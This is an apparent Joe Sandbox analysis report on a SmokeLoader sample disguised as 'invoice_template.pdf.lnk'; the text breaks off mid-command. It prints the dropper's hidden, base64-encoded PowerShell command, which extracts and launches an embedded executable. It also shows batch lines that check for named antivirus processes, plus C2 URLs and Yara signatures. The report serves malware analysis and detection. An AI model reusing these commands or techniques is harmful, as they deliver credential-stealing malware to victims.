Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
invoice_template.pdf.lnk

Overview

General Information

Sample name:invoice_template.pdf.lnk
Analysis ID:1550361
MD5:9843c5bbba28871898a11724713926a7
SHA1:28a28d00c8d8a6e284e679cbc94fc586b32650e8
SHA256:1fe661a6f1371bfd4b4c2fdc0e835f8ca8bbdc2d25b00b5b89846fc4cdeea2f1
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Found malware configuration
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected SmokeLoader
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Drops PE files with a suspicious file extension
Encrypted powershell cmdline option found
Found API chain indicative of debugger detection
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Powershell creates an autostart link
Powershell drops PE file
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Writes to foreign memory regions
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64native
  • powershell.exe (PID: 4428 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -e JABiADYANAAgAD0AIABAACgAUwBlAGwAZQBjAHQALQBTAHQAcgBpAG4AZwAgAC0AUABhAHQAdABlAHIAbgAgACIAYQBEAHUAYwBrACIAIAAtAFAAYQB0AGgAIAAuAFwAaQBuAHYAbwBpAGMAZQBfAHQAZQBtAHAAbABhAHQAZQAuAHAAZABmAC4AbABuAGsAKQAuAEwAaQBuAGUAIAAtAHIAZQBwAGwAYQBjAGUAIAAnAGEARAB1AGMAawAnADsAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABlAG4AdgA6AHQAZQBtAHAAXAB3AGkAbgBwAGQAZgAuAGUAeABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlACAALQBWAGEAbAB1AGUAIABAACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgA2ADQAKQApADsAIABpAG4AdgBvAGsAZQAtAGkAdABlAG0AIAAkAGUAbgB2ADoAdABlAG0AcABcAHcAaQBuAHAAZABmAC4AZQB4AGUA MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 1432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • winpdf.exe (PID: 4340 cmdline: "C:\Users\user\AppData\Local\Temp\winpdf.exe" MD5: 80FDAC591563D6CE2CAC6B0D254B8AC7)
      • cmd.exe (PID: 7220 cmdline: "C:\Windows\System32\cmd.exe" /c copy Coffee Coffee.bat & Coffee.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • tasklist.exe (PID: 828 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 6828 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 7888 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 7180 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 7692 cmdline: cmd /c md 367647 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • findstr.exe (PID: 6828 cmdline: findstr /V "HOWCONCERNEDPAMMURDER" Mice MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 7164 cmdline: cmd /c copy /b ..\Is + ..\Ashley + ..\Allan + ..\Span Y MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Productive.pif (PID: 5352 cmdline: Productive.pif Y MD5: 18CE19B57F43CE0A5AF149C96AECC685)
          • Productive.pif (PID: 7424 cmdline: C:\Users\user\AppData\Local\Temp\367647\Productive.pif MD5: 18CE19B57F43CE0A5AF149C96AECC685)
            • explorer.exe (PID: 5064 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
              • explorer.exe (PID: 4176 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: ED8F152C2498988F130BA8D85B321E12)
              • explorer.exe (PID: 3140 cmdline: C:\Windows\explorer.exe MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
              • explorer.exe (PID: 3684 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: ED8F152C2498988F130BA8D85B321E12)
              • explorer.exe (PID: 6792 cmdline: C:\Windows\explorer.exe MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
              • explorer.exe (PID: 808 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: ED8F152C2498988F130BA8D85B321E12)
              • explorer.exe (PID: 4480 cmdline: C:\Windows\explorer.exe MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
              • explorer.exe (PID: 6212 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: ED8F152C2498988F130BA8D85B321E12)
        • choice.exe (PID: 1588 cmdline: choice /d y /t 15 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • fejhsit (PID: 5924 cmdline: C:\Users\user\AppData\Roaming\fejhsit MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://quantumqube.org/index.php", "https://quantumqube.org/index.php", "http://innovixus.org/index.php", "https://innovixus.org/index.php"]}
SourceRuleDescriptionAuthorStrings
00000017.00000002.24415374233.0000000000A21000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
    0000000F.00000002.20019876866.0000000002950000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      0000000F.00000002.20019876866.0000000002950000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      0000000F.00000002.20020080729.0000000002C31000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        0000000F.00000002.20020080729.0000000002C31000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
        • 0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
        Click to see the 4 entries

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -e JABiADYANAAgAD0AIABAACgAUwBlAGwAZQBjAHQALQBTAHQAcgBpAG4AZwAgAC0AUABhAHQAdABlAHIAbgAgACIAYQBEAHUAYwBrACIAIAAtAFAAYQB0AGgAIAAuAFwAaQBuAHYAbwBpAGMAZQBfAHQAZQBtAHAAbABhAHQAZQAuAHAAZABmAC4AbABuAGsAKQAuAEwAaQBuAGUAIAAtAHIAZQBwAGwAYQBjAGUAIAAnAGEARAB1AGMAawAnADsAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABlAG4AdgA6AHQAZQBtAHAAXAB3AGkAbgBwAGQAZgAuAGUAeABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlACAALQBWAGEAbAB1AGUAIABAACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgA2ADQAKQApADsAIABpAG4AdgBvAGsAZQAtAGkAdABlAG0AIAAkAGUAbgB2ADoAdABlAG0AcABcAHcAaQBuAHAAZABmAC4AZQB4AGUA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -e JABiADYANAAgAD0AIABAACgAUwBlAGwAZQBjAHQALQBTAHQAcgBpAG4AZwAgAC0AUABhAHQAdABlAHIAbgAgACIAYQBEAHUAYwBrACIAIAAtAFAAYQB0AGgAIAAuAFwAaQBuAHYAbwBpAGMAZQBfAHQAZQBtAHAAbABhAHQAZQAuAHAAZABmAC4AbABuAGsAKQAuAEwAaQBuAGUAIAAtAHIAZQBwAGwAYQBjAGUAIAAnAGEARAB1AGMAawAnADsAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABlAG4AdgA6AHQAZQBtAHAAXAB3AGkAbgBwAGQAZgAuAGUAeABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlACAALQBWAGEAbAB1AGUAIABAACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgA2ADQAKQApADsAIABpAG4AdgBvAGsAZQAtAGkAdABlAG0AIAAkAGUAbgB2ADoAdABlAG0AcABcAHcAaQBuAHAAZABmAC4AZQB4AGUA, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5064, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -e JABiADYANAAgAD0AIABAACgAUwBlAGwAZQBjAHQALQBTAHQAcgBpAG4AZwAgAC0AUABhAHQAdABlAHIAbgAgACIAYQBEAHUAYwBrACIAIAAtAFAAYQB0AGgAIAAuAFwAaQBuAHYAbwBpAGMAZQBfAHQAZQBtAHAAbABhAHQAZQAuAHAAZABmAC4AbABuAGsAKQAuAEwAaQBuAGUAIAAtAHIAZQBwAGwAYQBjAGUAIAAnAGEARAB1AGMAawAnADsAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABlAG4AdgA6AHQAZQBtAHAAXAB3AGkAbgBwAGQAZgAuAGUAeABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlACAALQBWAGEAbAB1AGUAIABAACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgA2ADQAKQApADsAIABpAG4AdgBvAGsAZQAtAGkAdABlAG0AIAAkAGUAbgB2ADoAdABlAG0AcABcAHcAaQBuAHAAZABmAC4AZQB4AGUA, ProcessId: 4428, ProcessName: powershell.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -e JABiADYANAAgAD0AIABAACgAUwBlAGwAZQBjAHQALQBTAHQAcgBpAG4AZwAgAC0AUABhAHQAdABlAHIAbgAgACIAYQBEAHUAYwBrACIAIAAtAFAAYQB0AGgAIAAuAFwAaQBuAHYAbwBpAGMAZQBfAHQAZQBtAHAAbABhAHQAZQAuAHAAZABmAC4AbABuAGsAKQAuAEwAaQBuAGUAIAAtAHIAZQBwAGwAYQBjAGUAIAAnAGEARAB1AGMAawAnADsAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABlAG4AdgA6AHQAZQBtAHAAXAB3AGkAbgBwAGQAZgAuAGUAeABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlACAALQBWAGEAbAB1AGUAIABAACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgA2ADQAKQApADsAIABpAG4AdgBvAGsAZQAtAGkAdABlAG0AIAAkAGUAbgB2ADoAdABlAG0AcABcAHcAaQBuAHAAZABmAC4AZQB4AGUA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -e JABiADYANAAgAD0AIABAACgAUwBlAGwAZQBjAHQALQBTAHQAcgBpAG4AZwAgAC0AUABhAHQAdABlAHIAbgAgACIAYQBEAHUAYwBrACIAIAAtAFAAYQB0AGgAIAAuAFwAaQBuAHYAbwBpAGMAZQBfAHQAZQBtAHAAbABhAHQAZQAuAHAAZABmAC4AbABuAGsAKQAuAEwAaQBuAGUAIAAtAHIAZQBwAGwAYQBjAGUAIAAnAGEARAB1AGMAawAnADsAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABlAG4AdgA6AHQAZQBtAHAAXAB3AGkAbgBwAGQAZgAuAGUAeABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlACAALQBWAGEAbAB1AGUAIABAACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgA2ADQAKQApADsAIABpAG4AdgBvAGsAZQAtAGkAdABlAG0AIAAkAGUAbgB2ADoAdABlAG0AcABcAHcAaQBuAHAAZABmAC4AZQB4AGUA, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5064, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -e JABiADYANAAgAD0AIABAACgAUwBlAGwAZQBjAHQALQBTAHQAcgBpAG4AZwAgAC0AUABhAHQAdABlAHIAbgAgACIAYQBEAHUAYwBrACIAIAAtAFAAYQB0AGgAIAAuAFwAaQBuAHYAbwBpAGMAZQBfAHQAZQBtAHAAbABhAHQAZQAuAHAAZABmAC4AbABuAGsAKQAuAEwAaQBuAGUAIAAtAHIAZQBwAGwAYQBjAGUAIAAnAGEARAB1AGMAawAnADsAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABlAG4AdgA6AHQAZQBtAHAAXAB3AGkAbgBwAGQAZgAuAGUAeABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlACAALQBWAGEAbAB1AGUAIABAACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgA2ADQAKQApADsAIABpAG4AdgBvAGsAZQAtAGkAdABlAG0AIAAkAGUAbgB2ADoAdABlAG0AcABcAHcAaQBuAHAAZABmAC4AZQB4AGUA, ProcessId: 4428, ProcessName: powershell.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -e JABiADYANAAgAD0AIABAACgAUwBlAGwAZQBjAHQALQBTAHQAcgBpAG4AZwAgAC0AUABhAHQAdABlAHIAbgAgACIAYQBEAHUAYwBrACIAIAAtAFAAYQB0AGgAIAAuAFwAaQBuAHYAbwBpAGMAZQBfAHQAZQBtAHAAbABhAHQAZQAuAHAAZABmAC4AbABuAGsAKQAuAEwAaQBuAGUAIAAtAHIAZQBwAGwAYQBjAGUAIAAnAGEARAB1AGMAawAnADsAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABlAG4AdgA6AHQAZQBtAHAAXAB3AGkAbgBwAGQAZgAuAGUAeABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlACAALQBWAGEAbAB1AGUAIABAACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgA2ADQAKQApADsAIABpAG4AdgBvAGsAZQAtAGkAdABlAG0AIAAkAGUAbgB2ADoAdABlAG0AcABcAHcAaQBuAHAAZABmAC4AZQB4AGUA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -e JABiADYANAAgAD0AIABAACgAUwBlAGwAZQBjAHQALQBTAHQAcgBpAG4AZwAgAC0AUABhAHQAdABlAHIAbgAgACIAYQBEAHUAYwBrACIAIAAtAFAAYQB0AGgAIAAuAFwAaQBuAHYAbwBpAGMAZQBfAHQAZQBtAHAAbABhAHQAZQAuAHAAZABmAC4AbABuAGsAKQAuAEwAaQBuAGUAIAAtAHIAZQBwAGwAYQBjAGUAIAAnAGEARAB1AGMAawAnADsAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABlAG4AdgA6AHQAZQBtAHAAXAB3AGkAbgBwAGQAZgAuAGUAeABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlACAALQBWAGEAbAB1AGUAIABAACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgA2ADQAKQApADsAIABpAG4AdgBvAGsAZQAtAGkAdABlAG0AIAAkAGUAbgB2ADoAdABlAG0AcABcAHcAaQBuAHAAZABmAC4AZQB4AGUA, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5064, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -e JABiADYANAAgAD0AIABAACgAUwBlAGwAZQBjAHQALQBTAHQAcgBpAG4AZwAgAC0AUABhAHQAdABlAHIAbgAgACIAYQBEAHUAYwBrACIAIAAtAFAAYQB0AGgAIAAuAFwAaQBuAHYAbwBpAGMAZQBfAHQAZQBtAHAAbABhAHQAZQAuAHAAZABmAC4AbABuAGsAKQAuAEwAaQBuAGUAIAAtAHIAZQBwAGwAYQBjAGUAIAAnAGEARAB1AGMAawAnADsAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABlAG4AdgA6AHQAZQBtAHAAXAB3AGkAbgBwAGQAZgAuAGUAeABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlACAALQBWAGEAbAB1AGUAIABAACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgA2ADQAKQApADsAIABpAG4AdgBvAGsAZQAtAGkAdABlAG0AIAAkAGUAbgB2ADoAdABlAG0AcABcAHcAaQBuAHAAZABmAC4AZQB4AGUA, ProcessId: 4428, ProcessName: powershell.exe
        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Productive.pif Y, CommandLine: Productive.pif Y, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\367647\Productive.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\367647\Productive.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\367647\Productive.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Coffee Coffee.bat & Coffee.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7220, ParentProcessName: cmd.exe, ProcessCommandLine: Productive.pif Y, ProcessId: 5352, ProcessName: Productive.pif
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Coffee Coffee.bat & Coffee.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Coffee Coffee.bat & Coffee.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\winpdf.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\winpdf.exe, ParentProcessId: 4340, ParentProcessName: winpdf.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Coffee Coffee.bat & Coffee.bat, ProcessId: 7220, ProcessName: cmd.exe
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -e JABiADYANAAgAD0AIABAACgAUwBlAGwAZQBjAHQALQBTAHQAcgBpAG4AZwAgAC0AUABhAHQAdABlAHIAbgAgACIAYQBEAHUAYwBrACIAIAAtAFAAYQB0AGgAIAAuAFwAaQBuAHYAbwBpAGMAZQBfAHQAZQBtAHAAbABhAHQAZQAuAHAAZABmAC4AbABuAGsAKQAuAEwAaQBuAGUAIAAtAHIAZQBwAGwAYQBjAGUAIAAnAGEARAB1AGMAawAnADsAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABlAG4AdgA6AHQAZQBtAHAAXAB3AGkAbgBwAGQAZgAuAGUAeABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlACAALQBWAGEAbAB1AGUAIABAACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgA2ADQAKQApADsAIABpAG4AdgBvAGsAZQAtAGkAdABlAG0AIAAkAGUAbgB2ADoAdABlAG0AcABcAHcAaQBuAHAAZABmAC4AZQB4AGUA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -e JABiADYANAAgAD0AIABAACgAUwBlAGwAZQBjAHQALQBTAHQAcgBpAG4AZwAgAC0AUABhAHQAdABlAHIAbgAgACIAYQBEAHUAYwBrACIAIAAtAFAAYQB0AGgAIAAuAFwAaQBuAHYAbwBpAGMAZQBfAHQAZQBtAHAAbABhAHQAZQAuAHAAZABmAC4AbABuAGsAKQAuAEwAaQBuAGUAIAAtAHIAZQBwAGwAYQBjAGUAIAAnAGEARAB1AGMAawAnADsAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABlAG4AdgA6AHQAZQBtAHAAXAB3AGkAbgBwAGQAZgAuAGUAeABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlACAALQBWAGEAbAB1AGUAIABAACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgA2ADQAKQApADsAIABpAG4AdgBvAGsAZQAtAGkAdABlAG0AIAAkAGUAbgB2ADoAdABlAG0AcABcAHcAaQBuAHAAZABmAC4AZQB4AGUA, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5064, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -e JABiADYANAAgAD0AIABAACgAUwBlAGwAZQBjAHQALQBTAHQAcgBpAG4AZwAgAC0AUABhAHQAdABlAHIAbgAgACIAYQBEAHUAYwBrACIAIAAtAFAAYQB0AGgAIAAuAFwAaQBuAHYAbwBpAGMAZQBfAHQAZQBtAHAAbABhAHQAZQAuAHAAZABmAC4AbABuAGsAKQAuAEwAaQBuAGUAIAAtAHIAZQBwAGwAYQBjAGUAIAAnAGEARAB1AGMAawAnADsAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABlAG4AdgA6AHQAZQBtAHAAXAB3AGkAbgBwAGQAZgAuAGUAeABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlACAALQBWAGEAbAB1AGUAIABAACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgA2ADQAKQApADsAIABpAG4AdgBvAGsAZQAtAGkAdABlAG0AIAAkAGUAbgB2ADoAdABlAG0AcABcAHcAaQBuAHAAZABmAC4AZQB4AGUA, ProcessId: 4428, ProcessName: powershell.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -e JABiADYANAAgAD0AIABAACgAUwBlAGwAZQBjAHQALQBTAHQAcgBpAG4AZwAgAC0AUABhAHQAdABlAHIAbgAgACIAYQBEAHUAYwBrACIAIAAtAFAAYQB0AGgAIAAuAFwAaQBuAHYAbwBpAGMAZQBfAHQAZQBtAHAAbABhAHQAZQAuAHAAZABmAC4AbABuAGsAKQAuAEwAaQBuAGUAIAAtAHIAZQBwAGwAYQBjAGUAIAAnAGEARAB1AGMAawAnADsAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABlAG4AdgA6AHQAZQBtAHAAXAB3AGkAbgBwAGQAZgAuAGUAeABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlACAALQBWAGEAbAB1AGUAIABAACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgA2ADQAKQApADsAIABpAG4AdgBvAGsAZQAtAGkAdABlAG0AIAAkAGUAbgB2ADoAdABlAG0AcABcAHcAaQBuAHAAZABmAC4AZQB4AGUA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -e 